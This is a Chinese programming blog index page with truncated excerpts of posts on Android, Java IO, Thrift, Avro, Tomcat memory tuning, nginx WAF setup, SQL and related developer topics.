    最近用eclipse开发一个安卓app,listview使用baseadapter,里面有一个ImageView和两个TextView。使用了Holder内部类进行优化了还是很卡顿。后来发现是图片资源的问题。把一张分辨率高的图片放在了drawable-mdpi文件夹下,当我在每个item中显示,他都要进行缩放,导致很卡顿。解决办法是把这个高分辨率图片放到drawable-xxhdpi下。 &nb
  • 扩展easyUI tab控件,添加加载遮罩效果 知了ing jquery
    (function () { $.extend($.fn.tabs.methods, { //显示遮罩 loading: function (jq, msg) { return jq.each(function () { var panel = $(this).tabs(&
  • gradle上传jar到nexus 矮蛋蛋 gradle
    原文地址: https://docs.gradle.org/current/userguide/maven_plugin.html configurations {     deployerJars } dependencies {     deployerJars "org.apache.maven.wagon
  • 千万条数据外网导入数据库的解决方案。 alleni123 sqlmysql
    从某网上爬了数千万的数据,存在文本中。 然后要导入mysql数据库。 悲剧的是数据库和我存数据的服务器不在一个内网里面。。 ping了一下, 19ms的延迟。 于是下面的代码是没用的。 ps = con.prepareStatement(sql); ps.setString(1, info.getYear())............; ps.exec
  • JAVA IO InputStreamReader和OutputStreamReader 百合不是茶 JAVA.io操作 字符流
    这是第三篇关于java.io的文章了,从开始对io的不了解-->熟悉--->模糊,是这几天来对文件操作中最大的感受,本来自己认为的熟悉了的,刚刚在回想起前面学的好像又不是很清晰了,模糊对我现在或许是最好的鼓励 我会更加的去学 加油!: JAVA的API提供了另外一种数据保存途径,使用字符流来保存的,字符流只能保存字符形式的流   字节流和字符的难点:a,怎么将读到的数据
  • MO、MT解读 bijian1013 GSM
    MO= Mobile originate,上行,即用户上发给SP的信息。MT= Mobile Terminate,下行,即SP端下发给用户的信息; 上行:mo提交短信到短信中心下行:mt短信中心向特定的用户转发短信,你的短信是这样的,你所提交的短信,投递的地址是短信中心。短信中心收到你的短信后,存储转发,转发的时候就会根据你填写的接收方号码寻找路由,下发。在彩信领域是一样的道理。下行业务:由SP
  • 五个JavaScript基础问题 bijian1013 JavaScriptcallapplythisHoisting
    下面是五个关于前端相关的基础问题,但却很能体现JavaScript的基本功底。 问题1:Scope作用范围 考虑下面的代码:  (function() { var a = b = 5; })(); console.log(b); 什么会被打印在控制台上?  回答:         上面的代码会打印 5。 &nbs
  • 【Thrift二】Thrift Hello World bit1129 Hello world
    本篇,不考虑细节问题和为什么,先照葫芦画瓢写一个Thrift版本的Hello World,了解Thrift RPC服务开发的基本流程   1. 在Intellij中创建一个Maven模块,加入对Thrift的依赖,同时还要加上slf4j依赖,如果不加slf4j依赖,在后面启动Thrift Server时会报错 <dependency>
  • 【Avro一】Avro入门 bit1129 入门
    本文的目的主要是总结下基于Avro Schema代码生成,然后进行序列化和反序列化开发的基本流程。需要指出的是,Avro并不要求一定得根据Schema文件生成代码,这对于动态类型语言很有用。   1. 添加Maven依赖   <?xml version="1.0" encoding="UTF-8"?> <proj
  • 安装nginx+ngx_lua支持WAF防护功能 ronin47
    需要的软件:LuaJIT-2.0.0.tar.gz                   nginx-1.4.4.tar.gz          &nb
  • java-5.查找最小的K个元素-使用最大堆 bylijinnan java
    import java.util.Arrays; import java.util.Random; public class MinKElement { /** * 5.最小的K个元素 * I would like to use MaxHeap. * using QuickSort is also OK */ public static void
  • TCP的TIME-WAIT bylijinnan socket
    原文连接: http://vincent.bernat.im/en/blog/2014-tcp-time-wait-state-linux.html 以下为对原文的阅读笔记 说明: 主动关闭的一方称为local end,被动关闭的一方称为remote end 本地IP、本地端口、远端IP、远端端口这一“四元组”称为quadruplet,也称为socket 1、TIME_WA
  • jquery ajax 序列化表单 coder_xpf Jquery ajax 序列化
       checkbox 如果不设定值,默认选中值为on;设定值之后,选中则为设定的值   <input type="checkbox" name="favor" id="favor" checked="checked"/> $("#favor&quo
  • Apache集群乱码和最高并发控制 cuisuqiang apachetomcat并发集群乱码
    都知道如果使用Http访问,那么在Connector中增加URIEncoding即可,其实使用AJP时也一样,增加useBodyEncodingForURI和URIEncoding即可。 最大连接数也是一样的,增加maxThreads属性即可,如下,配置如下: <Connector maxThreads="300" port="8019" prot
  • websocket dalan_123 websocket
    一、低延迟的客户端-服务器 和 服务器-客户端的连接 很多时候所谓的http的请求、响应的模式,都是客户端加载一个网页,直到用户在进行下一次点击的时候,什么都不会发生。并且所有的http的通信都是客户端控制的,这时候就需要用户的互动或定期轮训的,以便从服务器端加载新的数据。   通常采用的技术比如推送和comet(使用http长连接、无需安装浏览器安装插件的两种方式:基于ajax的长
  • 菜鸟分析网络执法官 dcj3sjt126com 网络
      最近在论坛上看到很多贴子在讨论网络执法官的问题。菜鸟我正好知道这回事情.人道"人之患好为人师" 手里忍不住,就写点东西吧. 我也很忙.又没有MM,又没有MONEY....晕倒有点跑题. OK,闲话少说,切如正题. 要了解网络执法官的原理. 就要先了解局域网的通信的原理. 前面我们看到了.在以太网上传输的都是具有以太网头的数据包. 
  • Android相对布局属性全集 dcj3sjt126com android
    RelativeLayout布局android:layout_marginTop="25dip" //顶部距离android:gravity="left" //空间布局位置android:layout_marginLeft="15dip //距离左边距 // 相对于给定ID控件android:layout_above 将该控件的底部置于给定ID的
  • Tomcat内存设置详解 eksliang jvmtomcattomcat内存设置
    Java内存溢出详解   一、常见的Java内存溢出有以下三种:   1. java.lang.OutOfMemoryError: Java heap space ----JVM Heap(堆)溢出JVM在启动的时候会自动设置JVM Heap的值,其初始空间(即-Xms)是物理内存的1/64,最大空间(-Xmx)不可超过物理内存。 可以利用JVM提
  • Java6 JVM参数选项 greatwqs javaHotSpotjvmjvm参数JVM Options
    Java 6 JVM参数选项大全(中文版)   作者:Ken Wu Email: [email protected] 转载本文档请注明原文链接 http://kenwublog.com/docs/java6-jvm-options-chinese-edition.htm!   本文是基于最新的SUN官方文档Java SE 6 Hotspot VM Opt
  • weblogic创建JMC i5land weblogicjms
    进入 weblogic控制太 1.创建持久化存储 --Services--Persistant Stores--new--Create FileStores--name随便起--target默认--Directory写入在本机建立的文件夹的路径--ok 2.创建JMS服务器 --Services--Messaging--JMS Servers--new--name随便起--Pers
  • 基于 DHT 网络的磁力链接和BT种子的搜索引擎架构 justjavac DHT
    上周开发了一个磁力链接和 BT 种子的搜索引擎 {Magnet & Torrent},本文简单介绍一下主要的系统功能和用到的技术。 系统包括几个独立的部分: 使用 Python 的 Scrapy 框架开发的网络爬虫,用来爬取磁力链接和种子; 使用 PHP CI 框架开发的简易网站; 搜索引擎目前直接使用的 MySQL,将来可以考虑使
  • sql添加、删除表中的列 macroli sql
    添加没有默认值:alter table Test add BazaarType char(1) 有默认值的添加列:alter table Test add BazaarType char(1) default(0) 删除没有默认值的列:alter table Test drop COLUMN BazaarType 删除有默认值的列:先删除约束(默认值)alter table Test DRO
  • PHP中二维数组的排序方法 abc123456789cba 排序二维数组PHP
    <?php/*** @package     BugFree* @version     $Id: FunctionsMain.inc.php,v 1.32 2005/09/24 11:38:37 wwccss Exp $*** Sort an two-dimension array by some level
  • hive优化之------控制hive任务中的map数和reduce数 superlxw1234 hivehive优化
    一、    控制hive任务中的map数: 1.    通常情况下,作业会通过input的目录产生一个或者多个map任务。 主要的决定因素有: input的文件总个数,input的文件大小,集群设置的文件块大小(目前为128M, 可在hive中通过set dfs.block.size;命令查看到,该参数不能自定义修改);2. 
  • Spring Boot 1.2.4 发布 wiselyman spring boot
    Spring Boot 1.2.4已于6.4日发布,repo.spring.io and Maven Central可以下载(推荐使用maven或者gradle构建下载)。   这是一个维护版本,包含了一些修复small number of fixes,建议所有的用户升级。   Spring Boot 1.3的第一个里程碑版本将在几天后发布,包含许多
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他